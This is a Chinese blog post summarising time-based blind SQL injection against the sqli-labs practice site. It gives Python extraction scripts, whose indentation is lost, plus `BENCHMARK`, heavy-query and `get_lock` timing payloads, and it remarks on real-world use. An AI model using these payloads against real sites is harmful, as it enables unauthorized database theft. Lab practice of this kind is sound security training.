NEKO

sql blind inject summary

2018/06/26

抽空把sql盲注的姿势总结下.

以sqli-labs为例.

sleep()被禁就用BENCHMARK(10000000,SHA(‘1’))

含’,’,不含or

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
url='http://127.0.0.1/sqli-labs-master/Less-1/index.php'
result=''

for j in range(1,50):
for i in range(33, 125):
url1=url+"?id=1' and if(substr((select binary database())from %d)<'%s',sleep(4),1)-- -"%(j,chr(i))
try:
r=requests.get(url=url1,timeout=3)
except:
result+=chr(i-1)
print result
break

不含’,’,不含’or’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests
url='http://127.0.0.1/sqli-labs-master/Less-1/index.php'
result=''

for j in range(1,50):
for i in range(33, 125):
url1=url+"?id=1' and (select case when (substr((select database())from %d)<'%s') then sleep(4) else 0 end)-- -"%(j,chr(i))
print 'test:',chr(i)
try:
r=requests.get(url=url1,timeout=3)
except:
result+=chr(i-1)
print result
break

大负荷查询:

1
select if(1=1,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C,information_schema.tables D),1);

get_lock:
开两个mysql.
mysql1:

1
2
3
4
5
6
7
mysql> select get_lock('neko',1);
+--------------------+
| get_lock('neko',1) |
+--------------------+
| 1 |
+--------------------+
1 row in set (0.00 sec)

mysql2:

1
2
3
4
5
6
7
mysql> select get_lock('neko',3);
+--------------------+
| get_lock('neko',3) |
+--------------------+
| 0 |
+--------------------+
1 row in set (3.00 sec)

实战中可通过更换IP,或等待一段时间达到相同效果

原文作者: n3k0

发表日期: June 26th 2018, 2:11:44

发出嘶吼: 没有魔夜2玩我要死了

CATALOG